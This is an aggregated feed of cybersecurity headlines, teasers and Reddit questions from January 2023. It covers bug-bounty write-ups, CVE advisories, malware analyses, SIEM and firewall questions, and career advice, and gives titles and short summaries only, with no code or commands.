    These free tools for hackers are also good for application security QA: https://thestack.technology/free-fuzzing-tools-in-2023/ Continue reading on Medium »
    Pwn OWASP WebGoat with fuzz testing
    31 bugs in 4 minutes and 54% code coverage: new-era feedback-based fuzz testing like CI Fuzz needs to be in your CI/CD. Continue reading on Medium »
  • Open

    Exploiting Application Logic to Phish Internal Mailing Lists
    Tasked with performing a Red Team engagement on a tech company, I had to get creative to phish my way into their most critical assets. Continue reading on Medium »
    Bypass Windows Defender with a Reverse Shell
    Introduction Continue reading on Medium »
  • Open

    SecWiki News 2023-01-13 Review
    No news updated today~ For more of the latest articles, visit SecWiki
  • Open

    Movie scans
    https://www.doctormacro.com/Images/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    Endianness ( Big / Little Endian ) Concept for Exploit Developers
    No content preview
    Juicy Details — TryHackMe Writeup
    No content preview
    Lost Modulus — HackTheBox Crypto Challenge(RSA) Simple Writeup | 2023
    No content preview
    Strange 2FA Misconfiguration
    No content preview
    Clear communication is crucial: why writing effective vulnerability reports matters
    No content preview
    JNDI Injection Series: RMI Vector — The Final Piece of The Puzzle
    No content preview
    6 Tips for a More Secure Supply Chain
    Software supply chain security is a critical concern for organizations, find out how to make yours more secure using industry best… Continue reading on InfoSec Write-ups »
    Soccer — Hack The Box | Writeup with Flag | 2023
    No content preview
  • Open

    Typical mining family analysis series, part 3 | Sysrv-hello mining worm
    Sysrv-hello is a dual-platform (Windows and Linux) cryptomining worm that spreads by exploiting multiple vulnerabilities; its main purpose is to propagate the mining worm and then profit from mining.
    REST-Attacker: a security research framework for REST applications
    REST-Attacker is a security research framework for REST applications that lets researchers perform automated penetration testing and security research against APIs that follow the REST architectural style.

  • Open

    Python Port Scanner Lab!
    R. Eric Kiser Continue reading on Medium »
    SCCM Site Takeover via Automatic Client Push Installation
    tl;dr: Install hotfix KB15599094 and disable NTLM for client push installation. Continue reading on Posts By SpecterOps Team Members »
  • Open

    “and to search their networks for signs the vulnerability had been exploited on their networks.” how would you do this type of scan? What tools would you use?
    Fortigate just announced a vulnerability in their firewall devices. In the article they said that their customers should scan for signs of exploitation on their network. How would you do this? What tools would you use? My question is specific to this scenario. https://arstechnica.com/information-technology/2023/01/fortinet-says-hackers-exploited-critical-vulnerability-to-infect-vpn-customers/ submitted by /u/youreadumbmf35 [link] [comments]
    Anyone got the Exploit.In dump?
    I have a very old email and I don't remember its password (haven't logged into it since 2017). I know that it got hit by the exploit and I was wondering if maybe I could find it there. submitted by /u/PresentationHot1261 [link] [comments]
    Curious about this.
    My Facebook got hacked recently, and I get a little paranoid about what the hacker's motive is. So my Facebook account was retrieved via email, and while checking the logs and notifications, the only things that the hacker did were remove my access to one of my inactive pages (totally didn't care about this) and add a contact number on my profile which is a number for Vietnam (I'm not from Vietnam), and the hacker's location as per Facebook is in the United States. Anyone else here experienced the same scenario recently? What's the hacker's motive? submitted by /u/frenchie_20 [link] [comments]
    Researching SIEM
    I'm currently the Security Engineer focusing on our threat detection efforts. I come from a Splunk workshop, but we're currently using Google Chronicle. Google Chronicle lacks an online community. The documentation is vague and not as helpful, and there's no training available for the product. I'm realizing that the product lacks a lot of the features that I have become accustomed to. What SIEMs are you using, and what were the reasons you chose the SIEM? submitted by /u/tayvionp [link] [comments]
    Threat hunter skillset and roadmap analysis
    Hi /r/AskNetsec, I'm interested in becoming a threat hunter but I don't know where to begin and I could use some mentoring. I'm actively looking for a cybersecurity mentor to help me on my journey. A little about me: I have 5 years of experience as a Security Engineer. I specialize in identity and access management and cloud security. My organization is 100% cloud-based and we use the Microsoft security stack to manage our systems and technologies. I have experience in digital forensics, cryptography, network security, and compliance. I also have a master's degree in cybersecurity. Here are the key technical skills I've defined for being an effective threat hunter. I'm rating my understanding from 1-5, with 1 being no knowledge, 3 being average, to 5 being an expert, and they are in no c…
    Can't decrypt WPA3/WPA2 packets with Wireshark
    I am trying to monitor traffic on my network, but I can't seem to decrypt WPA3 packets. I'll go through the steps I took: I first set my Wi-Fi interface to monitor mode, then I changed the channel to 36 (5.18 GHz) as I have split 2.4 and 5 GHz bands, but most devices, at least the ones I wish to monitor, are on the 5 GHz band. After that I disconnected and reconnected my phone to capture the 4-step handshake, which went well, and all 4 packets showed up. I used the Wireshark WPA PSK generator to generate a key from my SSID and password, which I entered into the 802.11 protocol decryption settings. I exited and nothing; everything was still encrypted, the exact same as before. I double-checked and my handshake was still there. As mentioned, I am using WPA3, so maybe that has something to do with the issue? I am very confused here, so any guidance would be appreciated, thank you. Edit: I have changed my security to WPA2, and I can now see broadcasts like MDNS and ARP, and occasionally I’ll get TCP from my target machine, so maybe it’s a problem receiving the packets and not a problem with my software. submitted by /u/electromagneticpost [link] [comments]
    What technical skills make up a Pentester?
    As a pentester, how would you rank the importance of the following technical skills? How would you define the depth of knowledge for each skill set? What other skills would you add to this list? Coding in Python, PowerShell, C#; Web App Pentesting; Defense Evasion; Manual/Advanced exploitation and privesc; Networking Protocols; Pivoting. Any other topics to consider? submitted by /u/dfclin073 [link] [comments]
    Would linked emails be a good idea for protecting accounts?
    I was thinking about login credentials and am wondering why linked emails aren't offered as a solution. So when you sign up to websites, usually it is in the form of email, password. I am lazy so I just use Google to generate and store passwords for me. But what if the email used to create the account was unique for every website you signed up for and linked back to the main email you used? Let's say my email is [abc@gmail.com](mailto:abc@gmail.com); when I sign up to website A, Google generates me a linking email, [gd7awg28adh8@gmail.com](mailto:gd7awg28adh8@gmail.com), which links back to [abc@gmail.com](mailto:abc@gmail.com) and forwards all the messages to my main account. And when I sign up to website B, it links another email, [hwdahiusdifagwg78@gmail.com](mailto:hwdahiusdifagwg78@gmail.com). This would be beneficial in a few ways: 1. Maybe it would be harder to compromise accounts when hackers wouldn't even know what email they are trying to hack into? 2. If you don't have confidence in a website, they will never have your actual email. 3. If a website leaks your email or sells it or whatever, maybe there's a feature that can stop forwarding the emails to your main account so that you don't receive spam/dangerous emails? Just wanted to hear thoughts / flaws on this idea. Note: I asked this on r/cybersecurity but it was autoblocked by a bot for being a personal question. I feel like this post may also relate to this subreddit? submitted by /u/SaltyERB [link] [comments]
    Endpoint security in 100% BYOD organization
    Let's say there's an organization where 100% of the workforce is remote, and it's a non-profit, so the management team has decided to effectively require a BYOD environment for desktops/laptops as well as mobile devices to cut costs. There is no IT department, so this decision was made by people who are more budget managers than boots-on-the-ground technicians. They're not on a domain network of any kind and are loosely collected around a cloud-based office collaboration platform for doc and file storage, so it seems okay for everyone at the moment to just log in from their home computers, do their day's work and then clock out. Email is also handled through this cloud provider and MFA is enabled on all accounts (yay!). They also use an org password manager, so another +1 for safe practices. …
  • Open

    Yet another litany of "dumb" & "googlable" questions from a wanna-be red team member
    Background: I'm just a typical developer who aspires to be red team one day. I'm studying for the CISSP and would like to eventually become a red team member for the government. I have some credentials that allow me to work in this space, but I want to branch out from development and be more active in cyber security. I am AWS certified, and after the CISSP I will get the security certification from AWS. Has anyone tried a Portapack H2 Mayhem (RFOne knock-off, I think)? Just curious if anyone has tried this device. I saw it on eBay for 240 bucks and I've got some money burning a hole in my wallet, so I thought I might take a look at it, see what I can see with it. Reportedly it goes from 40 MHz up to 6 GHz. I don't think I'd ever be required to use it for any reason, but it might be fun to play…
  • Open

    Pods Bug Bounty V2
    Let’s hunt some bugs 🔍 Continue reading on Pods »
    Brute-force attacks Cheat Sheet (FTP, POP3, SNMP, SSH, VNC, …)
    Tool -> hydra Continue reading on Medium »
    From 2021 Through 2025, Global Cybersecurity Spending Will Exceed $1.75 Trillion.
    According to Cybersecurity Ventures, the need to secure increasingly digital enterprises, Internet of Things (IoT) devices, and customers… Continue reading on Bug Zero »
    Find Stored XSS & HTML Injections Easily
    This is a short tutorial to find stored XSS & HTML Injections easily. HTML injections occur when input isn’t sanitized to check or remove… Continue reading on Medium »
  • Open

    List of git commits before and after a security audit
    submitted by /u/kruksym [link] [comments]
    GraphQL exploitation – All you need to know – Cybervelia
    submitted by /u/Necessary-Reality-80 [link] [comments]
    Keeping the wolves out of wolfSSL (Protocol Fuzzing)
    submitted by /u/maxammann [link] [comments]
    Avoiding API Key Exposures: The Importance of Strong Fundamentals and the Limitations of AI
    submitted by /u/DevOpsMuffin39 [link] [comments]
    Exfiltration Over a Blocked Port on a Next-Gen Firewall
    submitted by /u/cuptugout [link] [comments]
  • Open

    How to solve 'Missing in action' [OSINT]
    Step by step writeup Continue reading on Write-ups HackTheBox »
    CHALLENGE ZEN
    Solution to a small challenge posted on Twitter on 11/01/2023. Try to solve it before reading the solution. Continue reading on Medium »
    Sin — Interview with a Cyber Detective
    Cybercrime Investigator, OSINT Dojo sensei Continue reading on Medium »
  • Open

    Fortinet says hackers exploited critical vulnerability to infect VPN customers
    Article URL: https://arstechnica.com/information-technology/2023/01/fortinet-says-hackers-exploited-critical-vulnerability-to-infect-vpn-customers/ Comments URL: https://news.ycombinator.com/item?id=34359651 Points: 8 # Comments: 0
  • Open

    DNS rebinding in --inspect (insufficient fix of CVE-2022-32212 affecting macOS devices)
    Internet Bug Bounty disclosed a bug submitted by zeyu2001: https://hackerone.com/reports/1714979 - Bounty: $4200
  • Open

    Introduction to Digital Forensics
    TryHackMe writeup: Dunkle Materie
    A case study in using ProcDOT to investigate a ransomware attack Continue reading on InfoSec Write-ups »
    Illumination — HackTheBox Forensics Writeup | 2023
  • Open

    Techniques in email forensics
    The various techniques in placing the suspect behind an email crime email forensic techniques submitted by /u/DFIRWarlock [link] [comments]
  • Open

    SecWiki News 2023-01-12 Review
    No news updated today~ For more of the latest articles, visit SecWiki
  • Open

    Network Security Trends: August-October 2022
    Network security trends: Unit 42 provides summaries and analysis of the vulnerabilities published between August-October 2022. The post Network Security Trends: August-October 2022 appeared first on Unit 42.
  • Open

    FreeBuf Morning Report | Apple faces a new privacy lawsuit; Swiss army secure communications found to have numerous vulnerabilities
    Royal Mail, the UK's multinational postal service and courier company, announced this week that a "cyber incident" has severely disrupted its operations.
    How to carry out macOS risk checks; how to arrange security duty over the Spring Festival | FB enterprise-side group topic discussion
    Is a Mac necessarily more secure than Windows and other systems? What plans are there for enterprise security duty and incident response over the Spring Festival? Click for more topics~
    FreeBuf Weekly | Qualcomm Snapdragon advisory covers 22 security vulnerabilities; Serbian government agencies hit by DDoS attacks
    This article rounds up the week's hot news, security incidents, good reads, and handy tools, so you won't miss any of this week's highlights!
    Twitter responds: the data of 200 million users was not leaked through a system vulnerability
    The much-discussed incident in which data on 200 million Twitter users was leaked and sold online may have taken a turn.
  • Open

    Comic strips & coloring pages
    http://www.thismodernworld.com/media/arc/ https://littleab.com/comicbooks/ http://archive.sonichq.net/images/scans/archie/ http://www.comiclist.com/media/users/cslepage/ http://enterthestory.com/comics/FF/ http://www.coloriez.com/images/coloriage/ https://www.indiaparenting.com/coloring-pages/uploads/ https://www.kidssearch.com/ColoringPages/ http://www.caboucadin.com/images/coloriages/ submitted by /u/Waste-Release-6235 [link] [comments]
    Bible studies
    http://www.amazingbible.org/Documents/Bible_Studies/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    A brief analysis of the MQTT attack surface and bug-hunting approaches
    Author: Su Xijie, 360 Vulnerability Research Institute. Original link: https://vul.360.net/archives/649 Preface: Many IoT devices run an MQTT service by default, which is an attack surface worth attention. Below we analyze the MQTT protocol and approaches to hunting for bugs in it. WHAT? MQTT is an asynchronous messaging protocol built on the TCP/IP stack; it is a lightweight publish/subscribe message transport protocol. It can scale in unreliable network environments and is suited to devices with limited hardware storage or network band...
  • Open

    Computer programs and stuff
    submitted by /u/themariocrafter [link] [comments]
    Random images and photos
    submitted by /u/themariocrafter [link] [comments]
    Games, retro ads, and other stuff
    http://ftp.us.matrixgames.com/pub/ https://www.whtech.com/ftp/games/ https://www.anorak.co.uk/wp-content/gallery/computer-adverts-retro/ http://pc.sux.org/SK/ https://www.retrowaste.com/wp-content/gallery/1990s-video-games-ads/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    How Russia appears in China: a look at Weibo
    I look at RT’s Sina Weibo feed to see if it can tell us anything interesting about Chinese speakers’ attitudes to Russia and the invasion. Continue reading on Medium »
    Deep Dive Benchmarking using OSINT Techniques on Google
    OSINT stands for “Open-Source Intelligence.” It refers to the practice of collecting, analyzing, and disseminating information that is… Continue reading on Medium »
    Logstash Filter Sentiment for Sentiment Analysis
    Overview Continue reading on Medium »
  • Open

    T95 Allwinner T616 Malware Analysis - "Pre-owned" Android TV Device
    submitted by /u/sanitybit [link] [comments]
    Legitify supports scanning GitLab for security misconfigurations and best practices
    submitted by /u/dotanoam [link] [comments]
    SANS Christmas Challenge 2022 - Write-up
    submitted by /u/the-useless-one [link] [comments]
  • Open

    Magnet Axiom Cyber Process - Analyze Evidence button "greyed" out.
    In Magnet AXIOM Process 6.9.0.34051 I'm unable to Analyze Evidence. I have 7 evidence sources, and all show with Status Ready. I've stepped through the processing details one by one, and turned on what I wanted. However, when I get to the Analyze Evidence page, the button remains inactive. I'm not sure what's wrong. Anyone have any ideas? submitted by /u/waydaws [link] [comments]
    Time to learn and advance in my career.
    I started cyber security classes and Pentesting is a big part of them. I am on a Lenovo P50 and the screen is starting to flicker. I am looking at an Alienware 15 series M or X, and an older Lenovo P53 as a replacement. I will be doing Pentesting and Digital forensics with it. I know the video card is for the forensics; the Alienware will have a 3070ti and the Lenovo will have the T2000. I love the Lenovo keyboard but I have used Alienwares in the past, just older models. What do you think? submitted by /u/Reaper_one1 [link] [comments]
  • Open

    Execute Beacon Object Files (BOF) as Shellcode
    https://github.com/frkngksl/Shoggoth submitted by /u/valgrute [link] [comments]
    Is there a large need for physical access pentesters as part of a routine engagement with a client?
    Essentially I'm asking: can I break in and physically access the network as a typical part of an evaluation for a client? Is that even a thing? I've been programming for 25 plus years and I'm tired of sitting behind the desk; I want to go play Jason Bourne and that involves breaking into things. I realize this is a very ambiguous question and subject to a number of factors, but I would be a complete newbie in the space of offensive security on a red team. I would just like to do something a little more challenging or just a completely different aspect of system security away from the keyboard, mainly. Did anyone else get into red team operations for the same reasons? I was also an electrician in the Air Force and so the hardware hacking part would be interesting to me. I got into or stumbled into this notion that I might one day make a hacker as skillful as ZeroCool. I still got my roller blades. On a slightly different topic, is a yardstick a handy tool to have? I should look this up but any good plans or tutz (lulz) on building a pineapple with a Raspberry Pi that anyone would vouch for? thx submitted by /u/mikealicious- [link] [comments]
  • Open

    Announcing Bug Bounty Rewards Program
    Check out this blog post in español, 简体中文, 繁體中文, 日本語, हिंदी, 한국인, tiếng-việt, deutsch, português, français, русский, українська, persian… Continue reading on Medium »
    Learning Web-Sec - Day 10 - Authentication Labs
    Vulnerabilities in Password Based login - PortSwigger Labs Walkthrough. Continue reading on System Weakness »
    A Newbie’s Guide to Bug Bounty Hunting: Navigating the World of Subdomain Enumeration and URL…
    I recently began my thrilling journey of bug bounty hunting and I’m excited to share my experiences with you. I selected HackerOne as my… Continue reading on Medium »
    bWAPP LDAP Injection
    What is LDAP? Continue reading on Medium »
    JWT Security 101: How to defend against common attacks on JSON Web Tokens
    JSON Web Tokens (JWT) are a popular way to represent claims securely between two parties. They are often used for authentication and… Continue reading on Medium »
    Hack Analysis: Nomad Bridge, August 2022
    Introduction Continue reading on Immunefi »
    ChatGPT hacking tools for bug bounty, pentesting, blue teams, and more
    Hackers aren’t shy in exploiting brilliant tools like ChatGPT. They have used ChatGPT’s capabilities to speed up script writing… Continue reading on Medium »
    What is Remote code execution (RCE)?
    What causes RCE? There are many potential causes of RCE vulnerabilities. Continue reading on Medium »
    Preventing Cross-Site Scripting (XSS) Attacks with the HTML Special Characters Function in PHP
    Introduction: Continue reading on Medium »
    Broken Access Control: What I have learned
    This is an ongoing post, constantly updated with new information that I learned about Broken Access Control. Continue reading on Medium »
  • Open

    soc2 type 2 vs iso27001 - product vs whole company ?
    So, we are a tech company that mostly develops different kinds of products, mostly webapps and some mobile applications. Our company is ISO 27001 certified and now we are in the process of achieving SOC2-Type2 certification. So, I am a bit confused: can our organization get a SOC2 type 2 certification, or do we need a specific PRODUCT or SERVICE XYZ and then only that can be SOC2 type 2 certified? submitted by /u/skinny3l3phant [link] [comments]
    Is a laptop bought at a wholesaler like Costco any different than the same laptop bought elsewhere?
    I’ve been warned off of buying laptops from wholesalers a few separate times without much explanation. submitted by /u/SendCOMPTIAvouchers [link] [comments]
  • Open

    Ys IX, Another Disappointment, but Ys: Memories of Celceta though!
    Man, enough is enough! Continue reading on ILLUMINATION Gaming »
    Ys IX, Another Disappointment, but Ys: Memories of Celceta though!
    Man, enough is enough! Continue reading on Medium »
  • Open

    SecWiki News 2023-01-11 Review
    今日暂未更新资讯~ 更多最新文章,请访问SecWiki
  • Open

    Security Issue into Wallet lock protection
    Hiro disclosed a bug submitted by bug_vs_me: https://hackerone.com/reports/1792544 - Bounty: $200
    CSRF vulnerability in Nextcloud Desktop Client 3.6.1 on Windows when clicking malicious link
    Nextcloud disclosed a bug submitted by lukasreschke: https://hackerone.com/reports/1741430 - Bounty: $1250
    Take over subdomain undici.nodejs.org.cdn.cloudflare.net
    Node.js disclosed a bug submitted by algisec1337: https://hackerone.com/reports/1763817
  • Open

    Analysis and reproduction of the Modbus Slave buffer overflow vulnerability CVE-2022-1068
    Modbus Slave is host-side software that simulates a Modbus slave station for the industrial communication protocol Modbus; it is mainly used for testing and debugging Modbus slave devices.
    FreeBuf Morning Report | Rail transit has become a prime target for hacker attacks; Danish central bank website hit by DDoS attack
    Government and military organizations in the Asia-Pacific region are being targeted by a previously unknown APT actor, Dark Pink.
    China Banking and Insurance Regulatory Commission issues the "Measures for the Administration of Banking and Insurance Regulatory Statistics"
    The Measures cover general provisions, regulatory statistics management bodies, regulatory statistical survey management, regulatory statistics management for banking and insurance institutions, supervision of regulatory statistics, and supplementary provisions.
    Just banned by the US government, is TikTok now facing EU privacy-protection troubles?
    TikTok CEO Shou Zi Chew visited the EU on the 10th for talks and was told to make improvements in areas such as privacy compliance.
    [2022 China White Hat Survey Report] survey launched
    You are invited to fill in the questionnaire truthfully to show the real situation of China's white hats in 2022.
    StrongPity hackers distribute backdoored apps to target Android users
    The StrongPity group targets Android users with a trojanized version of the Telegram app through a fake website impersonating a video chat service.
    A compilation of frequently asked questions on commercial cryptography application and security assessment
    Thirteen questions clarifying common points of commercial cryptography application and security assessment.
    Domain controller security: exporting ntds.dit
    ntdsutil.exe is a command-line tool that provides management facilities for Active Directory (AD). It is installed on domain controllers by default.
  • Open

    Okta Auth0 JWT vulnerability CVE-2022-23529
    Article URL: https://github.com/advisories/GHSA-27h2-hvpr-p74q Comments URL: https://news.ycombinator.com/item?id=34335244 Points: 6 # Comments: 2
  • Open

    Cacti: Unauthenticated Remote Code Execution (CVE-2022-46169)
    submitted by /u/monoimpact [link] [comments]
    How to find a Google account with a phone number
    submitted by /u/Gallus [link] [comments]
    Antivirus Evasion: Tearing AMSI down with 3 bytes only
    submitted by /u/juliocesarfort [link] [comments]
    Taking over a Dead IoT Company
    submitted by /u/phree_radical [link] [comments]
    Semgrep rules for Swift language (iOS mobile apps)
    submitted by /u/brugmayq [link] [comments]
    How to Analyze JavaScript Malware – A Case Study of Vjw0rm
    submitted by /u/CyberMasterV [link] [comments]
    An electromagnetic-wave side-channel issue on ARMv8 AES instructions
    submitted by /u/Gallus [link] [comments]
    ImageMagick Security Policy Evaluator
    submitted by /u/nibblesec [link] [comments]
  • Open

    How I passed the CBBH
    A bit of background on myself; My name is Trevor Slattery. I grew up in Belize and spent most of my life with little understanding of… Continue reading on Medium »
    How to Install a Tar.gz File on Linux?
    If you use Linux, you will sooner or later find yourself faced with the task of installing a tar.gz file. This article walks through the… Continue reading on Medium »
    How I Earned $1000 From Business Logic Vulnerability (account takeover)
    Hello security researchers, now I want to share my finding on a bug bounty program that earned $1000. Continue reading on Medium »
    Attacking Web Apps for Pentesting & Bug Bounty — Burpsuite
    Burp Suite is an incredibly powerful tool that is essential for any web application pen tester and bug-bounty hunter. In this article, we… Continue reading on Stealth Security »
    Unlock the boundless possibilities of ChatGPT: Hunt down pesky bugs and enjoy seamless automation!
    Are you a bug hunter? Looking for ways to up your game? Well, look no further! ChatGPT is possibly the best thing that’s happened to bug… Continue reading on Medium »
    2023 is here and yet again Experian strikes again
    My name is Jenya Kushnir I am the one who found this bug. I have tried to contact Experian myself to let them know they have a big problem… Continue reading on Medium »
    Ethical Hacking Roadmap with 23+ Courses
    Hello everyone, in this blog we have shared a full ethical hacking roadmap along with the courses you should study from scratch to pro to… Continue reading on Medium »
    Bypass OTP
    Hello Guys, Continue reading on Medium »
    Seven Common Ways To Bypass Login Page
    Hello to all beginner bug hunting fellows. This is Uttam Gupta; today I came with another blog on login pages. This blog is about… Continue reading on Medium »
  • Open

    The Step-by-Step Guide to Setting Up a Shell Company and Unlocking its Potential Benefits
    What is a Shell Company and How Can It Help Your Business? Continue reading on Medium »
    How to solve challenge 'Money Flowz' [OSINT]
    Details of the challenge when it was released (and the HTB website was much worse) Continue reading on Write-ups HackTheBox »
    How to solve 'ID Exposed' {OSINT} [HTB]
    Step by step solution to the challenge Continue reading on Write-ups HackTheBox »
    OSINT and Top 21 Open-Source Intelligence Tools
    This blog sheds some light on the term OSINT, its types, actors interested in OSINT gathering, exploration, and what benefits OSINT… Continue reading on Medium »
    Hashing: The Secret Life of Data
    Picture this: You download an important document but, for the life of you, can’t figure out if it’s the real deal or not; You’re sending… Continue reading on The First Digit »
  • Open

    What’s the best way to start freelancing pentesting services ?
    submitted by /u/Technical-Weather-60 [link] [comments]
  • Open

    Google XSS Game Solutions — Writeups
    These are my steps how I’ve solved the XSS Game Continue reading on Medium »
  • Open

    CVE-2022-46176: Cargo does not check SSH host keys
    Article URL: https://seclists.org/oss-sec/2023/q1/13 Comments URL: https://news.ycombinator.com/item?id=34328369 Points: 4 # Comments: 0
    Security advisory for Cargo (CVE-2022-46176)
    Article URL: https://blog.rust-lang.org/2023/01/10/cve-2022-46176.html Comments URL: https://news.ycombinator.com/item?id=34327807 Points: 2 # Comments: 0
    CVE-2022-23529 – node-jsonwebtoken
    Article URL: https://nvd.nist.gov/vuln/detail/CVE-2022-23529 Comments URL: https://news.ycombinator.com/item?id=34322778 Points: 2 # Comments: 3
  • Open

    Origin IP address disclosure through Pingora response header
    Cloudflare Public Bug Bounty disclosed a bug submitted by smither: https://hackerone.com/reports/1803659 - Bounty: $550
    Cross Origin Resource Sharing Misconfiguration
    Acronis disclosed a bug submitted by parshwa_21: https://hackerone.com/reports/958459
  • Open

    SecWiki News 2023-01-10 Review
    Java deserialization from 0 to CC1 by SecIN Community. For more of the latest articles, visit SecWiki
  • Open

    Word document
    Whenever I'm downloading a word document or just a pdf file I'm scared that I am hacked or that I have spyware... Is it possible for someone to spy on me if I downloaded a word file or checked out a pdf file on the internet? submitted by /u/Better_Presentation1 [link] [comments]
    Can NSO hack the iPhone in the lockdown mode?
    Apple describes Lockdown Mode as an extreme measure to protect the iPhone from state-level actors or advanced threats. It's Apple's response to NSO's Pegasus, which hacked the iPhone even with zero clicks. The question now is, can NSO come up with a new iteration of its tool to hack the iPhone in Lockdown Mode as well? What is your opinion? submitted by /u/chaplin2 [link] [comments]
    What could potentially happen when you connect to a shady free proxy?
    What exactly are the risks to using shady free proxies? I understand that if something is free, then you are the product, and that a big reason for using proxies is for privacy, and free proxies are not very good for your own privacy. My main interest with free proxies is having my bots avoid captchas. I know people really dislike questions that might seem dumb, but I really just want to learn. Thank you. submitted by /u/-GlobalFreedom- [link] [comments]
  • Open

    Top 10 secret weapons of the Russia-Ukraine cyber war | FreeBuf year in review
    A rundown of the 10 most-used secret weapons in the Russia-Ukraine cyber war, and which digital technologies and tools were used in the conflict.
    NetSupport RAT is spreading using a Pokémon game as bait
    NetSupport Manager is remote-control software that ordinary users can use and that is also frequently abused by attackers.
    FreeBuf Morning Report | US strengthens space cyber defenses for private companies; Microsoft to invest $10 billion in ChatGPT
    Microsoft is considering investing $10 billion in OpenAI, the owner of the AI-based chatbot ChatGPT.
    Adding fuel to the fire! Amid Balkan tensions, Serbian government agencies hit by DDoS attacks
    The Serbian government announced that its Ministry of Internal Affairs website and IT infrastructure suffered several "large-scale" distributed denial-of-service (DDoS) attacks.
    Qualcomm Snapdragon advisory covers 22 security vulnerabilities; Lenovo, Microsoft, and Samsung devices affected
    The vulnerabilities affect laptops and other devices made by Lenovo, Microsoft, and Samsung that use Snapdragon chipsets.
    To evade capture, dark web drug markets start using custom Android apps
    Online markets selling drugs and other illegal goods on the dark web have begun using custom Android apps to increase privacy and evade police.
    SCA: catching open-source security threats in one net
    SCA is a technique that identifies, manages, and tracks software by analyzing the information and characteristics it contains. Software composition analysis is a standard, basic part of any secure development lifecycle; finding problems early reduces cost, improves agility, makes software more secure, and helps development teams
    Building large capture files (II): Pcap analyzer: the Pcap filter of the Allegro Network Multimeter
    In the previous installment we discussed techniques for structured searching with Wireshark; in this one we introduce how to use the Allegro Network Multimeter to speed up pcap analyzer work.
  • Open

    A LAPS(e) in Judgement
    As security practitioners, we live in a time where there is an abundance of tools and solutions to help us secure our homes, organizations, and critical data. We know the dangers of unpatched applications and devices as well as the virtues of things like password managers and encrypted databases to protect our passwords and other... The post A LAPS(e) in Judgement appeared first on TrustedSec.
  • Open

    Manuals
    https://neurophysics.ucsd.edu/Manuals/Andor%20Technology/ http://www.pestingers.net/pdfs/ https://electrickery.nl/comp/trs80m2/doc/index.html https://gmcotton.com/Ham_Radio/MISC%20Manuals/ http://cpmarchives.classiccmp.org/trs80/Library/ submitted by /u/Waste-Release-6235 [link] [comments]
  • Open

    Awesome IDA, Ghidra, x64DBG, GDB & OllyDBG plugins
    submitted by /u/soupcreamychicken [link] [comments]
  • Open

    Online Bachelors degree
    Hi all, I’m looking to change career paths and am strongly considering Cybersecurity with a focus in Digital Forensics. I’ve looked into a few online schools (I work full time in healthcare so online is my only option) and I’d love some input. Utica College seems like a decent option but would love any other information from anyone who pursued this career path fully online. Thank you! submitted by /u/foebe3673 [link] [comments]

  • Open

    Certificate Subject Key Identifier (SKI)
    This will hopefully be a quick / easy question to answer. We're implementing Certificate Based Authentication (CBA) to some items in O365. We created the template with the required x509 extensions in our internal CA and successfully created all the necessary user certs. The one thing I noticed though is that the SKI is identical on all of the generated certs. Shouldn't this be a unique value on each cert? Each cert was created using a unique CSR and submitted through the CAs web portal if that matters. Thanks! submitted by /u/atokknight [link] [comments]
    Whitelisting Gmail SMTP in CSF
    In my csf.deny, I have 0.0.0.0/0 blocked to prevent requests being sent to the raw server IP. This creates issues with sending e-mails. I utilize Google SMTP to send e-mail. I can't seem to figure out how to whitelist Gmail's SMTP while blocking 0.0.0.0/0. My Gmail SMTP settings are correct, and send e-mail properly when I don't have 0.0.0.0/0 blocked. I've tried a variety of things to try to allow Gmail's SMTP through, including: - Only blocking incoming requests to all ports from 0.0.0.0/0 with no rules on outgoing requests - Performing nslookup smtp.gmail.com, and whitelisting those IPs - Whitelisting smtp.gmail.com in csf.dyndns No matter what I try, if 0.0.0.0/0 is in csf.deny, e-mail will not be sent. Any suggestions? submitted by /u/GivingUp_RS [link] [comments]
    Candidate screening - writing skills
    I work at a shop that requires technical and report writing skills. We don't have any questions that we can use during the interview process to determine if the candidate knows how to write, and I'm wondering what other companies have in place to solve that problem. Job hunters: writing is extremely important, don't just focus on technical skills. submitted by /u/IrrationalNumb3rs [link] [comments]
    Master Password Migration / Reuse?
    I'm moving off of LastPass and to a different manager for obvious reasons. Is it safe to use the same master password that I used for LP on the new site? My understanding is that LP never stored or had access to the master, so using the same password seems like it should be safe, but also feels weird. Thoughts? submitted by /u/NoGoodNamesLeft_2 [link] [comments]
    Is it safe to store CCTV videos on Wyze cloud?
    Hello, I'm using a Wyze camera device and also using its cloud service. Given the fact that the camera may sometimes record some sensitive moments, is it safe to store videos on Wyze cloud? As I know, I can access the CCTV footage on my mobile phone app only. Plus, I did enable MFA for my app. Any advice would be appreciated! submitted by /u/sanba06c [link] [comments]
    Is there an open data model standard for SIEM?
    so I know of some vendor information models/schema: Elastic -> ECS Sentinel -> ASIM Splunk -> CIM Qradar -> LEEF ArcSight -> CEF Google -> UDM wondering if there's any open standard somewhere for a standard log format. I'm asking mostly because there are thousands of open source projects providing their own logging system and if they follow an open standard for their information schema, converting that into any of the vendor-specific ones could be an easy task, especially for Sigma rules. submitted by /u/n0o0o0p [link] [comments]
    Implementing audit logging - need advice
    Hello, We are in the process of implementing an audit logging system, starting with getting the Windows logs of all our systems in one place. To get the data into New Relic for analysis and alerting, I'm using WinLogBeat going to LogStash, which then forwards the data. This is mostly as we have systems with no internet access. I trust this is a suitable solution but would value any feedback. Where I'm stuck is how to manage the log data once it reaches 90 days. New Relic allows for data export in JSON format which I could work with, but I'm wondering if there is a better way to do this - even if it means moving from New Relic to another tool (we have not yet committed to anything; this is my first time dealing with such a system). Looking for general advice here, would like to get this as right as possible the first time. Thanks in advance. submitted by /u/brettfk [link] [comments]
  • Open

    Basic Static Malware Analysis
    Hello guys! Today I have something great to show you, techniques and tools to perform a basic static malware analysis, but let’s explain… Continue reading on Medium »
    bypass two-factor authentication in Android apps and web 1000$ TikTok
    #bugbounty #bug #bounty Continue reading on Medium »
    Open redirects : bug bounties
    What are open redirects? Continue reading on Medium »
    Hacking Hackers for fun and profit
    This story will be in several parts. In each of the situations, I had to face unexpected results. Continue reading on Medium »
    How I Found AWS API Keys using “Trufflehog” and Validated them using “enumerate-iam” tool
    Hello Guys..!! Continue reading on AWS Tip »
    Hack Analysis: Beanstalk Governance Attack, April 2022
    Introduction Continue reading on Immunefi »
    “2022: A Year of Fascinating Discoveries”
    “Hello and welcome to my writeup! In this report, I will be sharing details about some of the vulnerabilities that I discovered in… Continue reading on Medium »
    Uploading the Webshell using filename of Content-Disposition Header Story!
